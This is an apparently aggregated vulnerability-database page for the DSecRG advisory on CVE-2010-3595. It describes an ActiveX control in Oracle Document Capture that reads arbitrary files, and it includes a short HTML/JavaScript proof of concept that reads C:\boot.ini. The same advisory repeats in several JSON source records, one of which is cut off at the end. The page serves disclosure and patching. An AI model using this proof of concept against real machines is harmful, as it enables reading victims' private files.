Search...

[DSECRG-11-007] Oracle Document Capture ImportBodyText - read files

2011-01-26T00:00:00

ID SECURITYVULNS:DOC:25553
Type securityvulns
Reporter Securityvulns
Modified 2011-01-26T00:00:00

Description

Digital Security Research Group [DSecRG] Advisory DSECRG-11-007 (Internal

DSECRG-00117)

Application: Oracle Document Capture
Versions Affected: 10.1350.0005 Vendor URL:
http://www.oracle.com/technology/software/products/content-management/index_dc.html Bugs: Insecure READ method Exploits: YES Reported: 29.01.2010 Second report: 02.02.2010
Date of Public Advisory: 24.01.2010
CVE: CVE-2010-3595 Authors: Alexey Sintsov by Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description

EasyMail ActiveX Control (emsmtp.dll) that included into Oracle Document Capture distrib can be used to read any file in target system. Vulnerable method is "ImportBodyText()".

Details

For example if you enter filename "C:\\boot.ini" in "ImportBodyText" method then control will open and read file "C:\boot.ini". Content of boot.ini will be loaded into property "BodyText" .

Class EasyMailSMTPObj GUID: {68AC0D5F-0424-11D5-822F-00C04F6BA8D9} Number of Interfaces: 1 Default Interface: IEasyMailSMTPObj RegKey Safe for Script: True RegKey Safe for Init: True KillBitSet: False

Example:

<HTML> <HEAD> <TITLE>DSECRG</TITLE> </HEAD> <BODY>

    &lt;OBJECT id=&#39;ora&#39;

classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9'></OBJECT>

    &lt;SCRIPT&gt;

    function Exploit&#40;&#41;{
            ora.ImportBodyText&#40;&quot;C:&#92;&#92;boot.ini&quot;&#41;;             
            document.write&#40;&quot;Try to read c:&#92;&#92;boot.ini:&lt;br&gt;&lt;br&gt;&quot;+ora.BodyText&#41;;
    }
    Exploit&#40;&#41;;

    &lt;/SCRIPT&gt;

</BODY> </HTML>

References

http://dsecrg.com/pages/vul/show.php?id=307 http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html

Fix Information

Information was published in CPU Jan 2011. All customers can download CPU patches following instructions from:

http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html

About

Digital Security:

Is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards.

Digital Security Research Group:

International subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product "ERPSCAN security suite for SAP NetWeaver" and service "ERPSCAN Online" which can help customers to perform automated security assessments and compliance checks for SAP solutions.

Contact: research [at] dsecrg [dot] com http://www.dsecrg.com http://www.erpscan.com

Polyakov Alexandr. PCI QSA,PA-QSA CTO Digital Security Head of DSecRG

DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polyakov@dsec.ru

www.dsec.ru www.dsecrg.com www.dsecrg.ru www.erpscan.com www.erpscan.ru www.pcidssru.com www.pcidss.ru

This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed.

JSON Vulners Source

Initial Source

{"id": "SECURITYVULNS:DOC:25553", "bulletinFamily": "software", "title": "[DSECRG-11-007] Oracle Document Capture ImportBodyText - read files", "description": "\r\nDigital Security Research Group [DSecRG] Advisory DSECRG-11-007 (Internal\r\n#DSECRG-00117)\r\n\r\n\r\nApplication: Oracle Document Capture \r\nVersions Affected: 10.1350.0005\r\nVendor URL: \r\nhttp://www.oracle.com/technology/software/products/content-management/index_dc.html\r\nBugs: Insecure READ method\r\nExploits: YES\r\nReported: 29.01.2010 \r\nSecond report: 02.02.2010 \r\nDate of Public Advisory: 24.01.2010 \r\nCVE: CVE-2010-3595\r\nAuthors: Alexey Sintsov\r\n by Digital Security Research Group [DSecRG]\r\n(research [at] dsecrg [dot] com)\r\n\r\n\r\n\r\nDescription\r\n***********\r\n\r\nEasyMail ActiveX Control (emsmtp.dll) that included into Oracle Document Capture\r\ndistrib\r\ncan be used to read any file in target system. Vulnerable method is\r\n"ImportBodyText()".\r\n\r\n\r\n\r\nDetails\r\n*******\r\n\r\nFor example if you enter filename "C:\\boot.ini" in "ImportBodyText" method then\r\ncontrol will \r\nopen and read file "C:\boot.ini". Content of boot.ini will be loaded into property\r\n"BodyText" .\r\n\r\n\r\nClass EasyMailSMTPObj\r\nGUID: {68AC0D5F-0424-11D5-822F-00C04F6BA8D9}\r\nNumber of Interfaces: 1\r\nDefault Interface: IEasyMailSMTPObj\r\nRegKey Safe for Script: True\r\nRegKey Safe for Init: True\r\nKillBitSet: False\r\n\r\n\r\n\r\nExample:\r\n*******\r\n\r\n<HTML>\r\n <HEAD>\r\n <TITLE>DSECRG</TITLE>\r\n </HEAD>\r\n <BODY>\r\n \r\n <OBJECT id='ora'\r\nclassid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9'></OBJECT>\r\n\r\n <SCRIPT>\r\n \r\n function Exploit(){\r\n ora.ImportBodyText("C:\\boot.ini"); \r\n document.write("Try to read c:\\boot.ini:<br><br>"+ora.BodyText);\r\n }\r\n Exploit();\r\n\r\n </SCRIPT>\r\n</BODY>\r\n</HTML>\r\n\r\n\r\n\r\nReferences\r\n**********\r\n\r\nhttp://dsecrg.com/pages/vul/show.php?id=307\r\nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\r\n\r\n\r\n\r\n\r\nFix Information\r\n*************\r\n\r\nInformation was published in CPU Jan 2011.\r\nAll customers can download CPU patches following instructions from: \r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\r\n\r\n\r\nAbout\r\n*****\r\n\r\nDigital Security: \r\n\r\nIs one of the leading IT security companies in CEMEA, providing information\r\nsecurity consulting, audit and penetration testing services, ERP and SAP security\r\nassessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards.\r\n\r\nDigital Security Research Group:\r\n\r\nInternational subdivision of Digital Security company focused on research and\r\nsoftware development for securing business-critical systems like: enterprise\r\napplications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking\r\nsoftware. DSecRG developed new product "ERPSCAN security suite for SAP NetWeaver"\r\nand service "ERPSCAN Online" which can help customers to perform automated security\r\nassessments and compliance checks for SAP solutions.\r\n\r\n\r\nContact: research [at] dsecrg [dot] com\r\nhttp://www.dsecrg.com\r\nhttp://www.erpscan.com\r\n\r\n\r\n\r\n\r\n\r\n\r\nPolyakov Alexandr. PCI QSA,PA-QSA\r\nCTO Digital Security\r\nHead of DSecRG\r\n______________________\r\nDIGITAL SECURITY\r\nphone: +7 812 703 1547\r\n +7 812 430 9130\r\ne-mail: a.polyakov@dsec.ru \r\n\r\nwww.dsec.ru\r\nwww.dsecrg.com www.dsecrg.ru\r\nwww.erpscan.com www.erpscan.ru\r\nwww.pcidssru.com www.pcidss.ru\r\n\r\n\r\n-----------------------------------\r\nThis message and any attachment are confidential and may be privileged or\r\notherwise protected \r\nfrom disclosure. If you are not the intended recipient any use, distribution,\r\ncopying or disclosure \r\nis strictly prohibited. If you have received this message in error, please notify\r\nthe sender immediately \r\neither by telephone or by e-mail and delete this message and any attachment from\r\nyour system. Correspondence \r\nvia e-mail is for information purposes only. Digital Security neither makes nor\r\naccepts legally binding \r\nstatements by e-mail unless otherwise agreed. \r\n-----------------------------------", "published": "2011-01-26T00:00:00", "modified": "2011-01-26T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25553", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2010-3595"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:38", "edition": 1, "viewCount": 49, "enchantments": {"score": {"value": 6.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2011-047"]}, {"type": "cve", "idList": ["CVE-2010-3595"]}, {"type": "erpscan", "idList": ["ERPSCAN-11-007"]}, {"type": "exploitdb", "idList": ["EDB-ID:16056"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:714D709238DEB768AE3C1EE6F9D9DF72"]}, {"type": "nessus", "idList": ["ORACLE_DOCUMENT_CAPTURE_ACTIVEX.NASL"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2011-194091"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:97872"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11380"]}, {"type": "seebug", "idList": ["SSV:70623"]}]}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2011-047"]}, {"type": "cve", "idList": ["CVE-2010-3595"]}, {"type": "erpscan", "idList": ["ERPSCAN-11-007"]}, {"type": "exploitdb", "idList": ["EDB-ID:16056"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:714D709238DEB768AE3C1EE6F9D9DF72"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2011-194091"]}]}, "exploitation": null, "vulnersScore": 6.4}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}

{"exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOracle - Document Capture Insecure READ Method", "edition": 2, "published": "2011-01-26T00:00:00", "title": "Oracle - Document Capture Insecure READ Method", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3595"], "modified": "2011-01-26T00:00:00", "id": "EXPLOITPACK:714D709238DEB768AE3C1EE6F9D9DF72", "href": "", "sourceData": "Source: http://packetstormsecurity.org/files/view/97872/DSECRG-11-007.txt\n\nDigital Security Research Group [DSecRG] Advisory DSECRG-11-007 (Internal #DSECRG-00117)\n\n\nApplication: Oracle Document Capture \nVersions Affected: 10.1350.0005\nVendor URL: http://www.oracle.com/technology/software/products/content-management/index_dc.html\nBugs: Insecure READ method\nExploits: YES\nReported: 29.01.2010 \nSecond report: 02.02.2010 \nDate of Public Advisory: 24.01.2010 \nCVE: CVE-2010-3595\nAuthors: Alexey Sintsov\n by Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)\n\n\n\nDescription\n***********\n\nEasyMail ActiveX Control (emsmtp.dll) that included into Oracle Document Capture distrib\ncan be used to read any file in target system. Vulnerable method is \"ImportBodyText()\".\n\n\n\nDetails\n*******\n\nFor example if you enter filename \"C:\\\\boot.ini\" in \"ImportBodyText\" method then control will \nopen and read file \"C:\\boot.ini\". Content of boot.ini will be loaded into property \"BodyText\" .\n\n\nClass EasyMailSMTPObj\nGUID: {68AC0D5F-0424-11D5-822F-00C04F6BA8D9}\nNumber of Interfaces: 1\nDefault Interface: IEasyMailSMTPObj\nRegKey Safe for Script: True\nRegKey Safe for Init: True\nKillBitSet: False\n\n\n\nExample:\n*******\n\n<HTML>\n <HEAD>\n <TITLE>DSECRG</TITLE>\n </HEAD>\n <BODY>\n \n <OBJECT id='ora' classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9'></OBJECT>\n\n <SCRIPT>\n \n function Exploit(){\n ora.ImportBodyText(\"C:\\\\boot.ini\"); \n document.write(\"Try to read c:\\\\boot.ini:<br><br>\"+ora.BodyText);\n }\n Exploit();\n\n </SCRIPT>\n</BODY>\n</HTML>\n\n\n\nReferences\n**********\n\nhttp://dsecrg.com/pages/vul/show.php?id=307\nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\n\n\n\n\nFix Information\n*************\n\nInformation was published in CPU Jan 2011.\nAll customers can download CPU patches following instructions from: \n\nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\n\n\nAbout\n*****\n\nDigital Security: \n\nIs one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards.\n\nDigital Security Research Group:\n\nInternational subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product \"ERPSCAN security suite for SAP NetWeaver\" and service \"ERPSCAN Online\" which can help customers to perform automated security assessments and compliance checks for SAP solutions.\n\n\nContact: research [at] dsecrg [dot] com\nhttp://www.dsecrg.com\nhttp://www.erpscan.com\n\n\n\n\n\n\nPolyakov Alexandr. PCI QSA,PA-QSA\nCTO Digital Security\nHead of DSecRG\n______________________\nDIGITAL SECURITY\nphone: +7 812 703 1547\n +7 812 430 9130\ne-mail: a.polyakov@dsec.ru \n\nwww.dsec.ru\nwww.dsecrg.com www.dsecrg.ru\nwww.erpscan.com www.erpscan.ru\nwww.pcidssru.com www.pcidss.ru\n\n\n-----------------------------------\nThis message and any attachment are confidential and may be privileged or otherwise protected \nfrom disclosure. If you are not the intended recipient any use, distribution, copying or disclosure \nis strictly prohibited. If you have received this message in error, please notify the sender immediately \neither by telephone or by e-mail and delete this message and any attachment from your system. Correspondence \nvia e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding \nstatements by e-mail unless otherwise agreed. \n-----------------------------------", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:33:15", "description": "Oracle Document Capture supplies document scanning and indexing capabilities. It installs an ActiveX control EasyMail on web clients An information disclosure vulnerability has been reported in the EasyMail ActiveX control included with Oracle Document Capture. The vulnerability is due to improper validation of user input within several methods by the EasyMail ActiveX control, allowing an attacker to read any file in the affected system. A remote attacker can exploit this issue by enticing target users to visit a malicious web page. Successful exploitation of this vulnerability will allow the attacker to read data which was not intended to be disclosed.", "cvss3": {}, "published": "2011-02-27T00:00:00", "type": "checkpoint_advisories", "title": "Oracle Document Capture EasyMail ActiveX Control Information Disclosure (CVE-2010-3595)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3595"], "modified": "2011-02-27T00:00:00", "id": "CPAI-2011-047", "href": "", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "seebug": [{"lastseen": "2017-11-19T16:55:03", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Oracle Document Capture Insecure READ Method", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3595"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70623", "id": "SSV:70623", "sourceData": "\n Source: http://packetstormsecurity.org/files/view/97872/DSECRG-11-007.txt\r\n\r\nDigital Security Research Group [DSecRG] Advisory DSECRG-11-007 (Internal #DSECRG-00117)\r\n\r\n\r\nApplication: Oracle Document Capture \r\nVersions Affected: 10.1350.0005\r\nVendor URL: http://www.oracle.com/technology/software/products/content-management/index_dc.html\r\nBugs: Insecure READ method\r\nExploits: YES\r\nReported: 29.01.2010 \r\nSecond report: 02.02.2010 \r\nDate of Public Advisory: 24.01.2010 \r\nCVE: CVE-2010-3595\r\nAuthors: Alexey Sintsov\r\n by Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)\r\n\r\n\r\n\r\nDescription\r\n***********\r\n\r\nEasyMail ActiveX Control (emsmtp.dll) that included into Oracle Document Capture distrib\r\ncan be used to read any file in target system. Vulnerable method is "ImportBodyText()".\r\n\r\n\r\n\r\nDetails\r\n*******\r\n\r\nFor example if you enter filename "C:\\\\boot.ini" in "ImportBodyText" method then control will \r\nopen and read file "C:\\boot.ini". Content of boot.ini will be loaded into property "BodyText" .\r\n\r\n\r\nClass EasyMailSMTPObj\r\nGUID: {68AC0D5F-0424-11D5-822F-00C04F6BA8D9}\r\nNumber of Interfaces: 1\r\nDefault Interface: IEasyMailSMTPObj\r\nRegKey Safe for Script: True\r\nRegKey Safe for Init: True\r\nKillBitSet: False\r\n\r\n\r\n\r\nExample:\r\n*******\r\n\r\n<HTML>\r\n <HEAD>\r\n <TITLE>DSECRG</TITLE>\r\n </HEAD>\r\n <BODY>\r\n \r\n <OBJECT id='ora' classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9'></OBJECT>\r\n\r\n <SCRIPT>\r\n \r\n function Exploit(){\r\n ora.ImportBodyText("C:\\\\boot.ini"); \r\n document.write("Try to read c:\\\\boot.ini:<br><br>"+ora.BodyText);\r\n }\r\n Exploit();\r\n\r\n </SCRIPT>\r\n</BODY>\r\n</HTML>\r\n\r\n\r\n\r\nReferences\r\n**********\r\n\r\nhttp://dsecrg.com/pages/vul/show.php?id=307\r\nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\r\n\r\n\r\n\r\n\r\nFix Information\r\n*************\r\n\r\nInformation was published in CPU Jan 2011.\r\nAll customers can download CPU patches following instructions from: \r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\r\n\r\n\r\nAbout\r\n*****\r\n\r\nDigital Security: \r\n\r\nIs one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards.\r\n\r\nDigital Security Research Group:\r\n\r\nInternational subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product "ERPSCAN security suite for SAP NetWeaver" and service "ERPSCAN Online" which can help customers to perform automated security assessments and compliance checks for SAP solutions.\r\n\r\n\r\nContact: research [at] dsecrg [dot] com\r\nhttp://www.dsecrg.com\r\nhttp://www.erpscan.com\r\n\r\n\r\n\r\n\r\n\r\n\r\nPolyakov Alexandr. PCI QSA,PA-QSA\r\nCTO Digital Security\r\nHead of DSecRG\r\n______________________\r\nDIGITAL SECURITY\r\nphone: +7 812 703 1547\r\n +7 812 430 9130\r\ne-mail: a.polyakov@dsec.ru \r\n\r\nwww.dsec.ru\r\nwww.dsecrg.com www.dsecrg.ru\r\nwww.erpscan.com www.erpscan.ru\r\nwww.pcidssru.com www.pcidss.ru\r\n\r\n\r\n-----------------------------------\r\nThis message and any attachment are confidential and may be privileged or otherwise protected \r\nfrom disclosure. If you are not the intended recipient any use, distribution, copying or disclosure \r\nis strictly prohibited. If you have received this message in error, please notify the sender immediately \r\neither by telephone or by e-mail and delete this message and any attachment from your system. Correspondence \r\nvia e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding \r\nstatements by e-mail unless otherwise agreed. \r\n-----------------------------------\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-70623", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "cve": [{"lastseen": "2022-03-23T12:33:10", "description": "Unspecified vulnerability in the Oracle Document Capture component in Oracle Fusion Middleware 10.1.3.4 and 10.1.3.5 allows remote attackers to affect confidentiality via unknown vectors related to Import Server. NOTE: the previous information was obtained from the January 2011 CPU. Oracle has not commented on claims from the original researcher that remote attackers can read arbitrary files via a full pathname in the first argument to the ImportBodyText method in the EasyMail ActiveX control (emsmtp.dll).", "cvss3": {}, "published": "2011-01-19T16:00:00", "type": "cve", "title": "CVE-2010-3595", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3595"], "modified": "2018-10-10T20:04:00", "cpe": ["cpe:/a:oracle:fusion_middleware:10.1.3.4", "cpe:/a:oracle:fusion_middleware:10.1.3.5"], "id": "CVE-2010-3595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3595", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:a:oracle:fusion_middleware:10.1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:fusion_middleware:10.1.3.5:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:19:22", "description": "", "cvss3": {}, "published": "2011-01-25T00:00:00", "type": "packetstorm", "title": "Oracle Document Capture Insecure READ Method", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3595"], "modified": "2011-01-25T00:00:00", "id": "PACKETSTORM:97872", "href": "https://packetstormsecurity.com/files/97872/Oracle-Document-Capture-Insecure-READ-Method.html", "sourceData": "` \nDigital Security Research Group [DSecRG] Advisory DSECRG-11-007 (Internal #DSECRG-00117) \n \n \nApplication: Oracle Document Capture \nVersions Affected: 10.1350.0005 \nVendor URL: http://www.oracle.com/technology/software/products/content-management/index_dc.html \nBugs: Insecure READ method \nExploits: YES \nReported: 29.01.2010 \nSecond report: 02.02.2010 \nDate of Public Advisory: 24.01.2010 \nCVE: CVE-2010-3595 \nAuthors: Alexey Sintsov \nby Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) \n \n \n \nDescription \n*********** \n \nEasyMail ActiveX Control (emsmtp.dll) that included into Oracle Document Capture distrib \ncan be used to read any file in target system. Vulnerable method is \"ImportBodyText()\". \n \n \n \nDetails \n******* \n \nFor example if you enter filename \"C:\\\\boot.ini\" in \"ImportBodyText\" method then control will \nopen and read file \"C:\\boot.ini\". Content of boot.ini will be loaded into property \"BodyText\" . \n \n \nClass EasyMailSMTPObj \nGUID: {68AC0D5F-0424-11D5-822F-00C04F6BA8D9} \nNumber of Interfaces: 1 \nDefault Interface: IEasyMailSMTPObj \nRegKey Safe for Script: True \nRegKey Safe for Init: True \nKillBitSet: False \n \n \n \nExample: \n******* \n \n<HTML> \n<HEAD> \n<TITLE>DSECRG</TITLE> \n</HEAD> \n<BODY> \n \n<OBJECT id='ora' classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9'></OBJECT> \n \n<SCRIPT> \n \nfunction Exploit(){ \nora.ImportBodyText(\"C:\\\\boot.ini\"); \ndocument.write(\"Try to read c:\\\\boot.ini:<br><br>\"+ora.BodyText); \n} \nExploit(); \n \n</SCRIPT> \n</BODY> \n</HTML> \n \n \n \nReferences \n********** \n \nhttp://dsecrg.com/pages/vul/show.php?id=307 \nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html \n \n \n \n \nFix Information \n************* \n \nInformation was published in CPU Jan 2011. \nAll customers can download CPU patches following instructions from: \n \nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html \n \n \nAbout \n***** \n \nDigital Security: \n \nIs one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards. \n \nDigital Security Research Group: \n \nInternational subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product \"ERPSCAN security suite for SAP NetWeaver\" and service \"ERPSCAN Online\" which can help customers to perform automated security assessments and compliance checks for SAP solutions. \n \n \nContact: research [at] dsecrg [dot] com \nhttp://www.dsecrg.com \nhttp://www.erpscan.com \n \n \n \n \n \n \nPolyakov Alexandr. PCI QSA,PA-QSA \nCTO Digital Security \nHead of DSecRG \n______________________ \nDIGITAL SECURITY \nphone: +7 812 703 1547 \n+7 812 430 9130 \ne-mail: a.polyakov@dsec.ru \n \nwww.dsec.ru \nwww.dsecrg.com www.dsecrg.ru \nwww.erpscan.com www.erpscan.ru \nwww.pcidssru.com www.pcidss.ru \n \n \n----------------------------------- \nThis message and any attachment are confidential and may be privileged or otherwise protected \nfrom disclosure. If you are not the intended recipient any use, distribution, copying or disclosure \nis strictly prohibited. If you have received this message in error, please notify the sender immediately \neither by telephone or by e-mail and delete this message and any attachment from your system. Correspondence \nvia e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding \nstatements by e-mail unless otherwise agreed. \n----------------------------------- \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/97872/DSECRG-11-007.txt", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "erpscan": [{"lastseen": "2020-09-15T20:41:42", "description": "**Application:** Oracle Document Capture \n**Versions Affected:** 10.1350.0005 \n**Vendor URL:** [Oracle](<http://www.oracle.com/>) \n**Bugs:** Unsecure READ method \n**Exploits:** YES \n**Reported:** 29.01.2010 \n**Second report:** 02.02.2010 \n**Date of Public Advisory:** 24.01.2010 \n**CVE-number:**CVE-2010-3595 \n**Author:** Alexey Sintsov \n\n**Description** \nEasyMail ActiveX Control (emsmtp.dll) that included into Oracle Document Capture distrib can be used to read any file in target system. Vulnerable method is \u00abImportBodyText()\u00bb.\n\n**Business Risk** \nAn attacker can send a malicious link to an unaware user via e-mail, messaging or social networks. He also can insert this link into corporate portal. When clicking this link the end user browser will call vulnerable ActiveX component which can read any file on victim\u2019s workstation and send it to attacker. It can be files with stored passwords or cookie files that store session data or SSO tickets. Attacker can use them to get unauthorized access to business-critical applications \n", "edition": 7, "published": "2010-01-29T00:00:00", "title": "Oracle Document Capture ImportBodyText \u2014 read files", "type": "erpscan", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3595"], "modified": "2010-01-29T00:00:00", "id": "ERPSCAN-11-007", "href": "https://erpscan.io/advisories/erpscan-11-007-oracle-document-capture-importbodytext-read-files-2/", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "exploitdb": [{"lastseen": "2022-01-13T06:48:17", "description": "", "cvss3": {}, "published": "2011-01-26T00:00:00", "type": "exploitdb", "title": "Oracle - Document Capture Insecure READ Method", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3595", "2010-3595"], "modified": "2011-01-26T00:00:00", "id": "EDB-ID:16056", "href": "https://www.exploit-db.com/exploits/16056", "sourceData": "Source: http://packetstormsecurity.org/files/view/97872/DSECRG-11-007.txt\r\n\r\nDigital Security Research Group [DSecRG] Advisory DSECRG-11-007 (Internal #DSECRG-00117)\r\n\r\n\r\nApplication: Oracle Document Capture \r\nVersions Affected: 10.1350.0005\r\nVendor URL: http://www.oracle.com/technology/software/products/content-management/index_dc.html\r\nBugs: Insecure READ method\r\nExploits: YES\r\nReported: 29.01.2010 \r\nSecond report: 02.02.2010 \r\nDate of Public Advisory: 24.01.2010 \r\nCVE: CVE-2010-3595\r\nAuthors: Alexey Sintsov\r\n by Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)\r\n\r\n\r\n\r\nDescription\r\n***********\r\n\r\nEasyMail ActiveX Control (emsmtp.dll) that included into Oracle Document Capture distrib\r\ncan be used to read any file in target system. Vulnerable method is \"ImportBodyText()\".\r\n\r\n\r\n\r\nDetails\r\n*******\r\n\r\nFor example if you enter filename \"C:\\\\boot.ini\" in \"ImportBodyText\" method then control will \r\nopen and read file \"C:\\boot.ini\". Content of boot.ini will be loaded into property \"BodyText\" .\r\n\r\n\r\nClass EasyMailSMTPObj\r\nGUID: {68AC0D5F-0424-11D5-822F-00C04F6BA8D9}\r\nNumber of Interfaces: 1\r\nDefault Interface: IEasyMailSMTPObj\r\nRegKey Safe for Script: True\r\nRegKey Safe for Init: True\r\nKillBitSet: False\r\n\r\n\r\n\r\nExample:\r\n*******\r\n\r\n<HTML>\r\n <HEAD>\r\n <TITLE>DSECRG</TITLE>\r\n </HEAD>\r\n <BODY>\r\n 